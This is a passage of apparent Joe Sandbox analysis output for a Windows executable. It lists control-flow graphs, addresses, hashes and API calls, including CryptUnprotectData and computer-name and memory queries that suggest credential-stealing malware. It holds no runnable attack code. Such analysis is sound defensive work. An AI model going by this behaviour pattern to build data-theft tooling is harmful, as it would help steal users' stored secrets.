42efc0-42efc9 411->413 412->409 413->410 413->413
                                                    APIs
                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InstalledMemoryPhysicallySystem
                                                    • String ID: $qk$'5%s
                                                    • API String ID: 3960555810-1674721824
                                                    • Opcode ID: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
                                                    • Instruction ID: 77e35e584cd91eb5155daa22bb8d7f3faef11dd04174e3cb06e18610c7d197b5
                                                    • Opcode Fuzzy Hash: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
                                                    • Instruction Fuzzy Hash: C6D1D4716047428FD719CF2AC491762FBE2BF96300B2DC5AEC4DA8B752D739A806CB54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 414 42ecd0-42ed01 call 435ec0 call 407f90 420 42ed10-42ed3d 414->420 420->420 421 42ed3f-42ed44 420->421 422 42ed46-42ed49 421->422 423 42ed5d 421->423 424 42ed50-42ed59 422->424 425 42ed5f-42ed6b 423->425 424->424 426 42ed5b 424->426 427 42ed81-42edc6 call 441c60 GetPhysicallyInstalledSystemMemory 425->427 428 42ed6d-42ed6f 425->428 426->425 433 42edd0-42edf7 427->433 429 42ed70-42ed7d 428->429 429->429 431 42ed7f 429->431 431->427 433->433 434 42edf9-42ee2e call 41c7d0 433->434 437 42ee30-42ee85 434->437 437->437 438 42ee87-42ee8f 437->438 439 42ee91-42ee97 438->439 440 42eead-42eeaf 438->440 441 42eea0-42eea9 439->441 442 42eeb2-42eebf 440->442 441->441 443 42eeab 441->443 444 42eec1-42eec2 442->444 445 42eedb-42eee5 442->445 443->442 446 42eed0-42eed9 444->446 447 42eee7-42eee8 445->447 448 42eefb-42ef3f 445->448 446->445 446->446 449 42eef0-42eef9 447->449 450 42ef40-42ef85 448->450 449->448 449->449 450->450 451 42ef87-42ef8c 450->451 452 42ef8e-42ef94 451->452 453 42efad-42efb0 451->453 454 42efa0-42efa9 452->454 455 42efb2-42efba 453->455 454->454 458 42efab 454->458 456 42efcb-42f08e 455->456 457 42efbc-42efbf 455->457 459 42efc0-42efc9 457->459 458->455 459->456 459->459
                                                    APIs
                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InstalledMemoryPhysicallySystem
                                                    • String ID: $qk$'5%s
                                                    • API String ID: 3960555810-1674721824
                                                    • Opcode ID: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
                                                    • Instruction ID: 774d1c6582b6df23f03d333cf1ee8e77294ae5f4637bee10b1881aef683745b3
                                                    • Opcode Fuzzy Hash: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
                                                    • Instruction Fuzzy Hash: A4B1E1716047428BD719CF2AC450362FBE2BFA6300F6DC5AEC4DA8B752D739A846CB54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 460 40ae60-40aee8 461 40aef0-40aef9 460->461 461->461 462 40aefb-40af0e 461->462 464 40af20 462->464 465 40b260 462->465 466 40b2d0-40b2d6 462->466 467 40af22-40af24 462->467 468 40af15-40af1a 462->468 469 40b2b5-40b2bb 462->469 470 40af29-40b153 462->470 471 40b1de-40b257 call 407e60 462->471 472 40b1cf-40b1d9 462->472 473 40b2af 462->473 474 40b2df-40b2ef 462->474 464->467 466->474 475 40b5b9-40b5c0 467->475 468->464 469->466 476 40b160-40b1ae 470->476 471->465 471->466 471->469 471->473 471->474 479 40b3c0 471->479 480 40b540 471->480 481 40b542-40b54d 471->481 482 40b285-40b2aa call 441c60 471->482 483 40b3c6-40b3de 471->483 484 40b589 471->484 485 40b50d-40b517 call 440260 471->485 486 40b44e-40b458 471->486 487 40b350 471->487 488 40b590-40b597 471->488 489 40b352-40b368 471->489 490 40b554 471->490 491 40b416-40b422 471->491 492 40b55a-40b561 471->492 493 40b59d-40b5ad 471->493 494 40b49e-40b4b6 471->494 495 40b45f-40b466 471->495 496 40b3e5-40b40d call 441c60 471->496 497 40b266-40b27e 471->497 498 40b4ec-40b4ed 471->498 499 40b52f-40b534 471->499 500 40b570 471->500 501 40b473-40b491 call 441c60 471->501 502 40b2f6-40b307 471->502 503 40b437-40b447 471->503 504 40b4b8-40b4e5 471->504 505 40b57d-40b580 471->505 477 40b5b0-40b5b6 472->477 474->465 474->479 474->480 474->481 474->482 474->483 474->484 474->485 474->486 474->487 474->488 474->489 474->490 474->491 474->492 474->493 474->494 474->495 474->496 474->497 474->498 474->499 474->500 474->501 474->502 474->503 474->504 474->505 476->476 509 40b1b0-40b1bb 476->509 477->475 481->465 481->479 481->482 481->483 481->484 481->488 481->490 481->492 481->493 481->495 481->496 481->497 481->498 481->500 481->501 481->505 482->493 483->465 483->482 483->484 483->488 483->493 483->496 483->497 483->505 484->488 516 40b51c-40b528 485->516 486->465 486->479 486->482 486->483 486->484 486->488 486->492 486->493 486->495 486->496 486->497 486->500 486->501 486->505 488->493 513 40b370-40b396 489->513 519 40b429-40b430 491->519 492->500 493->477 494->498 495->501 496->491 497->482 497->493 514 40b4f4-40b506 498->514 499->480 520 40b577 500->520 501->494 512 40b310-40b33d 502->512 503->465 503->479 503->480 503->481 503->482 503->483 503->484 503->485 503->486 503->488 503->490 503->492 503->493 503->494 503->495 503->496 503->497 503->498 503->499 503->500 503->501 503->504 503->505 504->465 504->479 504->482 504->483 504->484 504->488 504->490 504->492 504->493 504->495 504->496 504->497 504->498 504->500 504->501 504->505 505->484 528 40b1bf-40b1c8 509->528 512->512 526 40b33f-40b348 512->526 513->513 515 40b398-40b3b3 513->515 514->465 514->479 514->480 514->481 514->482 514->483 514->484 514->485 514->488 514->490 514->492 514->493 514->495 514->496 514->497 514->498 514->499 514->500 514->501 514->504 514->505 515->465 515->479 515->480 515->481 515->482 515->483 515->484 515->485 515->486 515->488 515->490 515->491 515->492 515->493 515->494 515->495 515->496 515->497 515->498 515->499 515->500 515->501 515->503 515->504 515->505 516->465 516->479 516->480 516->481 516->482 516->483 516->484 516->488 516->490 516->492 516->493 516->495 516->496 516->497 516->498 516->499 516->500 516->501 516->504 516->505 519->465 519->479 519->480 519->481 519->482 519->483 519->484 519->485 519->486 519->488 519->490 519->492 519->493 519->494 519->495 519->496 519->497 519->498 519->499 519->500 519->501 519->503 519->504 519->505 520->505 526->487 528->465 528->466 528->469 528->471 528->472 528->473 528->474 528->479 528->480 528->481 528->482 528->483 528->484 528->485 528->486 528->487 528->488 528->489 528->490 528->491 528->492 528->493 528->494 528->495 528->496 528->497 528->498 528->499 528->500 528->501 528->502 528->503 528->504 528->505
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >;$SpYv$06$4:
                                                    • API String ID: 0-3243906123
                                                    • Opcode ID: 9236da7ddfd6fb07e582297a530c3c26716b54592089834dbe2b9dbe45865d1f
                                                    • Instruction ID: ba3b2f4d1e4dad876d63f93e4022fe59a9fa94051f0befbaffaca00d2fa64594
                                                    • Opcode Fuzzy Hash: 9236da7ddfd6fb07e582297a530c3c26716b54592089834dbe2b9dbe45865d1f
                                                    • Instruction Fuzzy Hash: 4D0254B5140B00CFD3208F25D895B97BBF5FB8A318F058A2CD5AA4BB90D779A405CF95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 551 40cb44-40cb8b CoInitializeSecurity * 2
                                                    APIs
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB56
                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB72
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeSecurity
                                                    • String ID:
                                                    • API String ID: 640775948-0
                                                    • Opcode ID: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                    • Instruction ID: ff61b9231b5af6c48cb1d82934a630ea8aeeaa7d7eb1477661cb3efef4af383c
                                                    • Opcode Fuzzy Hash: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                    • Instruction Fuzzy Hash: 72E0BD383C83007BF6398B08AC97F247221A743F22F301214B3623E2E58AE07140451D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
                                                    • Instruction ID: fd6d0c28c0521a4b2d3ba0d2fcd6f101c3ce844309344171b6c888af52a4c48d
                                                    • Opcode Fuzzy Hash: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
                                                    • Instruction Fuzzy Hash: F5821975A04B408FD714DF38C985396BBE2AF85324F198A3DD4EB877D2E678A445CB02
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: CryptDataUnprotect
                                                    • String ID:
                                                    • API String ID: 834300711-0
                                                    • Opcode ID: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
                                                    • Instruction ID: 5b988ee3757d9e29ab9f296af5c767d3f7ba0e13420727c7ac46e6bec5acf77a
                                                    • Opcode Fuzzy Hash: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
                                                    • Instruction Fuzzy Hash: 115134716446025FCB19CF29CCC1687BBE2FB89304F19806ED8999F357EA79E8438744
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: klm"
                                                    • API String ID: 2994545307-2308819284
                                                    • Opcode ID: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
                                                    • Instruction ID: 8789bd8e5de170319836c8e6b4e836532e50f116dbbdcba0dddf1708612731d7
                                                    • Opcode Fuzzy Hash: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
                                                    • Instruction Fuzzy Hash: 8EB15A7270C3618BE7188F39E84167BB791EF95314F99862ED48597381D378EC0683DA
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: CryptDataUnprotect
                                                    • String ID:
                                                    • API String ID: 834300711-0
                                                    • Opcode ID: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
                                                    • Instruction ID: 877a3ec0fd1df911aac285de86fc99df006a5b0b03a90c59e71951ea2dd66968
                                                    • Opcode Fuzzy Hash: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
                                                    • Instruction Fuzzy Hash: 343128B5900B419FC7308F29CC84766BBE2BF55304F19496EE46ACB761D739E881CB44
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: CryptDataUnprotect
                                                    • String ID:
                                                    • API String ID: 834300711-0
                                                    • Opcode ID: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
                                                    • Instruction ID: 1a59348ec05e7f56259579615360e9f91351b56b2fbfb5c12ef62eceb2dabcd0
                                                    • Opcode Fuzzy Hash: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
                                                    • Instruction Fuzzy Hash: 8111E3B59006419FC7248F25CC84BA6B7E2BF55704F29892ED86ACB761D73AF881CB44
                                                    APIs
                                                    • LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: h~BL
                                                    • API String ID: 0-1016882582
                                                    • Opcode ID: 2353f16c686568adc0586de7d1e93e01bd2d2aed02e5eac9b0619ca2789dfc7a
                                                    • Instruction ID: d310ecfdec240870e155c2d86c43ce513ec1b225dc1c5596defbf7cef2baff88
                                                    • Opcode Fuzzy Hash: 2353f16c686568adc0586de7d1e93e01bd2d2aed02e5eac9b0619ca2789dfc7a
                                                    • Instruction Fuzzy Hash: 90517D35355742CBD714CA28C4D0362BBA2DFA7310B9883BEC5958B7C6C32D980AD765
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WT
                                                    • API String ID: 0-3626323073
                                                    • Opcode ID: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                    • Instruction ID: 7fe90350ce32cbd7e95176aa356467c42c1670bfe7b117e2a0000bb4fcdc20cd
                                                    • Opcode Fuzzy Hash: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                    • Instruction Fuzzy Hash: 27213A766083408FC7288F24C89066BF7E2EFC6318F19891DD69717685DB75A806CF8A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2d82591e91d10e09f68e4e62c6a1b274d23b673b58491adfe2bed0ec565945a
                                                    • Instruction ID: 74a6effee417382a1a5ee657c987477b534f3e8da231505bdffe7cb23820d89a
                                                    • Opcode Fuzzy Hash: e2d82591e91d10e09f68e4e62c6a1b274d23b673b58491adfe2bed0ec565945a
                                                    • Instruction Fuzzy Hash: 93022175608601CFD7248F24C8816A773F1FF89318B18857EE96A8B7A1E739F842CB55
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 89ab3f1be10696e4686676121cb5646f329c94f14f9f75f0b417905d0925eb00
                                                    • Instruction ID: 43641b0080f28784645b742a7ad2c42294f4f9943e41220fa131c894d675aac7
                                                    • Opcode Fuzzy Hash: 89ab3f1be10696e4686676121cb5646f329c94f14f9f75f0b417905d0925eb00
                                                    • Instruction Fuzzy Hash: 4AA177366083028BD314DF28C99056BB7E2EFD5720F59863EE89597391DB78DC01CB96
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: aa586c2c0759b266de9262f8240903d80018af3b36a19caac19472dee2b72fdf
                                                    • Instruction ID: bb37cd5a5ec90571467f2d819b8aa1c05cb322f86de6a72c59221bb73edef1ff
                                                    • Opcode Fuzzy Hash: aa586c2c0759b266de9262f8240903d80018af3b36a19caac19472dee2b72fdf
                                                    • Instruction Fuzzy Hash: 0D8189316083108BE7189F29DC8157BB7A2EBC5324F29863DF996473D5DBB4DC068786
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: dabd88d03abec76c668a24312a925fda9f82045ef69a88c7f2ce8900658708d5
                                                    • Instruction ID: c528c2ca4be2e476e1abc7d903b0acb0bac1af5d968177d182933651f6946a82
                                                    • Opcode Fuzzy Hash: dabd88d03abec76c668a24312a925fda9f82045ef69a88c7f2ce8900658708d5
                                                    • Instruction Fuzzy Hash: F561F871A002218BDB18CF64C89177BB7B2FF99314F0A826DD646AB3A5D7799C01C798
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
                                                    • Instruction ID: 8f228e5e5a1e4a0df9a7232996a6af5781287942daa8e57b9f502877da121123
                                                    • Opcode Fuzzy Hash: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
                                                    • Instruction Fuzzy Hash: 4F312735B406428BE7298F29D850332FBA3EF96324B2C825DD1D1577E6D778EC42C644

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 534 40c9a6-40caf5 CoInitializeEx * 2
                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CADC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID: i.
                                                    • API String ID: 2538663250-1725878519
                                                    • Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                    • Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
                                                    • Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                    • Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 535 42f3c5-42f3f4 call 441c60 538 42f400-42f426 535->538 538->538 539 42f428-42f431 538->539 540 42f433-42f43b 539->540 541 42f44b-42f495 call 441c60 539->541 542 42f440-42f449 540->542 546 42f4a0-42f4c5 541->546 542->541 542->542 546->546 547 42f4c7-42f4ce 546->547 548 42f4d0-42f4d6 547->548 549 42f4eb-42f514 GetComputerNameExA 547->549 550 42f4e0-42f4e9 548->550 550->549 550->550
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042F4FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: ABQH
                                                    • API String ID: 3545744682-2857704541
                                                    • Opcode ID: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
                                                    • Instruction ID: 5b9f06d29d21be6fc1f49ae5373236c4f88bea70ce57d6927e68f4d7a729ffcc
                                                    • Opcode Fuzzy Hash: 21a26049c95029f14debd43ff901fc75587960d99a2a052f20e81db94443e019
                                                    • Instruction Fuzzy Hash: CC3126742046928FD715CF24D890663BBF2EF66314F14816DD4E21BB42C379685ACBA5

                                                    Control-flow Graph

                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 004406A2
                                                    • GetForegroundWindow.USER32 ref: 004406B1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: ForegroundWindow
                                                    • String ID:
                                                    • API String ID: 2020703349-0
                                                    • Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                    • Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
                                                    • Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                    • Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitVariant
                                                    • String ID:
                                                    • API String ID: 1927566239-0
                                                    • Opcode ID: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
                                                    • Instruction ID: f7f883e2ad49da0fecad536576301c807aa78c4ca5f2a4f40745664147204c84
                                                    • Opcode Fuzzy Hash: abb8198e76b9dbc638f6b64f0f056e50e4a5a60b888bb2a26f00c9e297661d1a
                                                    • Instruction Fuzzy Hash: 0A414F70108BC08EE365CB38C598757BFE16B56308F48489DD5D68BB92C7BAB509CB62
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID:
                                                    • API String ID: 3545744682-0
                                                    • Opcode ID: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
                                                    • Instruction ID: 76e407ce98a51277e7cb13f46241631caeedb7dd1d9a2c9078d1ba909d45b5aa
                                                    • Opcode Fuzzy Hash: bef4936573cb1b14369d8eaac4f9090ae5688f478e73a6ad368257c6db6403fa
                                                    • Instruction Fuzzy Hash: 122190742046928BEB158F25D4617B3BBE1EF53300F6885AAD4C69B392D7389C86CB64
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042F62E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID:
                                                    • API String ID: 3545744682-0
                                                    • Opcode ID: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
                                                    • Instruction ID: d9a4f91a2702334bf36e07a4eed7b442d690e9a594b68c6ebc6cd94c5554eabc
                                                    • Opcode Fuzzy Hash: 2a2e06b06b06b3c81bc5c5135b626a7c0281056ffdb54b32e1af479912c1722b
                                                    • Instruction Fuzzy Hash: 7A11A1742046428BEB058F24D8A1BB7BBF2EF56300F5885A9D196DB392D738DC86CB54
                                                    APIs
                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: DefaultLanguageUser
                                                    • String ID:
                                                    • API String ID: 95929093-0
                                                    • Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                    • Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
                                                    • Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                    • Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753
                                                    APIs
                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                    • Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
                                                    • Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                    • Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: BlanketProxy
                                                    • String ID:
                                                    • API String ID: 3890896728-0
                                                    • Opcode ID: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
                                                    • Instruction ID: 3c134e449782a57cf71f1962354a437f9829e02efeb86ae6b61234eae4da8937
